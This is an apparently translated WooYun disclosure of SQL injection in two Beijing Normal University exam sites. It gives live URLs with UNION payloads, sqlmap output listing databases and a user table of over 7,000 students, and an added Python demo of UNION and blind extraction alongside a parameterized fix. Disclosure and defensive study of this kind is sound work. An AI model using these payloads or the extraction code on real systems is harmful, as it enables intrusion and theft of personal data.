
Vulnerability summary

Defect ID: wooyun-2015-0166120

Title: Beijing Normal University SQL injection bundle (北京师范大学注入打包)

Affected vendor: 北京师范大学 (Beijing Normal University)

Author: 路人甲

Submitted: 2015-12-30 19:02

Fix deadline: 2016-02-12 18:49

Published: 2016-02-12 18:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-30: details sent to the vendor, awaiting vendor action
2016-01-04: vendor confirmed; details disclosed to the vendor only
2016-01-14: details disclosed to core white hats and relevant domain experts
2016-01-24: details disclosed to regular white hats
2016-02-03: details disclosed to intern white hats
2016-02-12: details disclosed to the public

Brief description:

Beijing Normal University (北京师范大学, "BNU") is directly administered by the Ministry of Education of the People's Republic of China with vice-ministerial status, belongs to Project 211 and Project 985, was selected for the national Zhufeng Plan, the 2011 Plan, the 111 Plan and the Excellent Legal Talent Education Program, has a graduate school, and is a comprehensive national key university whose main strengths are teacher education, educational science and the basic arts and science disciplines.

Detailed description:

1) Beijing Normal University joint training class (共训班) online test platform:
http://gxb.bnu.edu.cn/Index.php/Notice/shownot?nid=-37%20%20union%20select%201,user%28%29,database%28%29,4

URL-decoded, the manual probe is nid=-37 union select 1,user(),database(),4: the negative id matches no notice, so the four-column UNION row is the only one rendered and the page shows the MySQL user() and database() in place of the notice fields. sqlmap confirms the same parameter with three techniques:

GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=37 AND 5521=5521

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: nid=37 AND (SELECT * FROM (SELECT(SLEEP(1)))jqxg)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: nid=-3919 UNION ALL SELECT NULL,CONCAT(0x71627a6271,0x694d5778707168434d69,0x716a767a71),NULL,NULL--
---
[15:06:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.12
[15:06:45] [INFO] fetching database names
[15:06:46] [INFO] the SQL query used returns 3 entries
[15:06:48] [INFO] retrieved: information_schema
[15:06:49] [INFO] retrieved: dangxiao_exam
[15:06:50] [INFO] retrieved: test
available databases [3]:
[*] dangxiao_exam
[*] information_schema
[*] test

A caveat on the fingerprint line: sqlmap's "ASP.NET" comes from response headers (IIS 7.x sends X-Powered-By: ASP.NET by default, whatever the application is written in), while the /Index.php/Notice/shownot route shows the application itself is PHP served by IIS 7.5.


[screenshot: 1.png]


2) Beijing Normal University school rules and discipline (校规校纪) test platform:
http://ldsr.bnu.edu.cn/Index.php/Notice/shownot?nid=-27%20union%20select%201,user%28%29,database%28%29,4

Same route, same parameter and the same three injection techniques, so this is evidently the same code base deployed a second time:

GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 39 HTTP(s) requests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=27 AND 5159=5159

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: nid=27 AND (SELECT * FROM (SELECT(SLEEP(1)))fekI)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: nid=-1429 UNION ALL SELECT NULL,CONCAT(0x7170706b71,0x4952726d6c61434e6f71,0x7170627871),NULL,NULL--
---
[15:03:21] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] exam
[*] information_schema
[*] test


Hard to look at: so many tables.
The lb_user table (7,488 rows, marked in the listing below) exposes more than 7,000 students' names, departments and majors (the xingming, yuanxi and zhuanye columns), together with username, e-mail, registration IP and a varchar(32) password column. A 32-character password field is the width of a hex MD5 digest, but the report does not dump the values, so whether they are hashed or salted is not shown. The dede_ tables sharing the exam database are the DedeCMS default schema, so the exam platform and a CMS install live in one database under one account.

Database: exam
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| lb_useranswer | 464898 |
| lb_usertestlog | 18189 |
| lb_usergroup | 17990 |
| lb_user | 7488 | <————————
| lb_usertestlog_all | 4766 |
| dede_sys_enum | 3347 |
| lb_userquestions | 2658 |
| lb_answers | 743 |
| dede_area | 482 |
| lb_questions | 351 |
| dede_sysconfig | 150 |
| dede_archives | 136 |
| dede_arctiny | 136 |
| dede_addonarticle | 135 |
| dede_asktype | 35 |
| dede_arctype | 21 |
| dede_stepselect | 15 |
| dede_scores | 12 |
| lb_notice | 11 |
| dede_co_mediaurls | 10 |
| lb_groups | 10 |
| dede_uploads | 9 |
| dede_arcatt | 8 |
| dede_arcrank | 8 |
| dede_flinktype | 8 |
| dede_plus | 8 |
| dede_sys_module | 7 |
| dede_ask | 6 |
| dede_channeltype | 6 |
| dede_shops_paytype | 5 |
| dede_payment | 4 |
| dede_shops_delivery | 4 |
| dede_tagindex | 4 |
| dede_taglist | 4 |
| lb_tests | 4 |
| test | 4 |
| dede_admintype | 3 |
| dede_co_onepage | 3 |
| dede_flink | 3 |
| dede_guestbook | 3 |
| dede_moneycard_type | 3 |
| dede_mytag | 3 |
| dede_search_keywords | 3 |
| dede_store_groups | 3 |
| lb_adminuser | 3 |
| dede_freelist | 2 |
| dede_member_model | 2 |
| dede_member_stowtype | 2 |
| dede_sys_set | 2 |
| dede_addonspec | 1 |
| dede_admin | 1 |
| dede_arccache | 1 |
| dede_arcmulti | 1 |
| dede_askanswer | 1 |
| dede_co_note | 1 |
| dede_homepageset | 1 |
| dede_member | 1 |
| dede_member_group | 1 |
| dede_member_person | 1 |
| dede_member_space | 1 |
| dede_member_tj | 1 |
| dede_member_type | 1 |
| dede_myad | 1 |
| dede_mynews | 1 |
| dede_softconfig | 1 |
| dede_vote | 1 |
+----------------------+---------+
Database: exam
Table: lb_user
[9 columns]
+-----------+---------------+
| Column | Type |
+-----------+---------------+
| id | mediumint(10) |
| password | varchar(32) |
| regip | varchar(20) |
| regtime | datetime |
| useremail | varchar(20) |
| username | varchar(15) |
| xingming | varchar(45) |
| yuanxi | varchar(45) |
| zhuanye | varchar(45) |
+-----------+---------------+


[screenshot: 2.png]
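To make the two mechanisms above concrete, and to show the fix that the remediation section leaves to the vendor, here is an added example; it is not code from the BNU sites, from DedeCMS or from the report. It is a stand-in for a Notice/shownot?nid= handler that splices nid into its SQL, the UNION dump and the boolean-based blind extraction that the report's nid=-37 union select ... and nid=37 AND 5521=5521 payloads perform against it, and the parameterized version that closes the hole. SQLite stands in for MySQL, so sqlite_version() replaces user()/database() and unicode() replaces ORD(); the table names lb_notice and lb_user come from the report, but every column and row here is constructed sample data.

```python
import sqlite3

# Added example, not code from the affected sites. SQLite stands in for MySQL.
# lb_notice and lb_user are names the report lists; the columns and rows below
# are constructed sample data.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE lb_notice(id INTEGER, title TEXT, body TEXT, ctime TEXT);
        INSERT INTO lb_notice VALUES (37, 'Exam notice', 'Room 101', '2015-12-01');
        CREATE TABLE lb_user(id INTEGER, username TEXT, password TEXT, xingming TEXT);
        INSERT INTO lb_user VALUES (1, 'admin', '5f4dcc3b5aa765d9', 'Zhang San');
    """)
    return conn


def shownot_vulnerable(conn, nid):
    """The bug: nid is spliced into the WHERE clause, so '37 AND 5521=5521'
    and '-37 UNION SELECT ...' both execute as SQL. Returns the rows the
    page would render."""
    sql = "SELECT id, title, body, ctime FROM lb_notice WHERE id=" + nid
    return conn.execute(sql).fetchall()


def shownot_fixed(conn, nid):
    """The fix: reject anything that is not an integer, then bind it as a
    parameter, so the query text is the same whatever nid contains."""
    nid_int = int(nid)  # ValueError for '37 AND 5521=5521' or '-37 UNION ...'
    sql = "SELECT id, title, body, ctime FROM lb_notice WHERE id=?"
    return conn.execute(sql, (nid_int,)).fetchall()


def union_dump(conn, expr):
    """The report's nid=-37 union select 1,user(),database(),4 pattern: an id
    that matches nothing empties the real result, and a UNION with the same
    column count (4 here) puts expr into the 'body' slot the page displays."""
    payload = f"-37 UNION SELECT 1, sqlite_version(), ({expr}), 4"
    rows = shownot_vulnerable(conn, payload)
    return rows[0][2]


def blind_extract(conn, expr, max_len=64):
    """Boolean-based blind, the technique behind sqlmap's 'nid=37 AND 5521=5521'
    probe: the page shows notice 37 when the appended condition is true and
    nothing when it is false, so each request leaks one bit. Bisecting the
    character code over 0..127 costs 7 requests per character, plus one
    length probe per position. Returns (extracted string, request count)."""
    requests = 0

    def truthy(cond):
        nonlocal requests
        requests += 1
        return len(shownot_vulnerable(conn, f"37 AND ({cond})")) > 0

    value = ""
    for pos in range(1, max_len + 1):
        if not truthy(f"length(({expr})) >= {pos}"):
            break                      # past the end of the string
        lo, hi = 0, 127
        while lo < hi:                 # invariant: the code point is in [lo, hi]
            mid = (lo + hi) // 2
            # SQLite unicode() plays the role of MySQL ORD()/ASCII()
            if truthy(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value, requests


if __name__ == "__main__":
    db = make_db()
    secret = "SELECT password FROM lb_user WHERE username='admin'"
    print("union :", union_dump(db, secret))
    print("blind :", blind_extract(db, secret))
    print("fixed :", shownot_fixed(db, "37"))
    try:
        shownot_fixed(db, "37 AND 5521=5521")
    except ValueError as err:
        print("fixed handler rejects tampered nid:", err)
```

The request count returned by blind_extract is the practical reason the UNION route matters: with an echoing column, one request dumps a value that blind inference needs over a hundred requests to recover, which is also why a WAF or log review should treat a burst of near-identical nid= requests differing only in an appended condition as the signature of the blind technique. The fix deliberately does not escape the input; an integer id should be validated as an integer and bound, and the same rule applies to every other id-style parameter on the same code base.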


Proof of vulnerability:

Same as the detailed description above.


Remediation:

You're the experts.

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2016-01-04 08:01

Vendor reply:

Thanks

Latest status:

None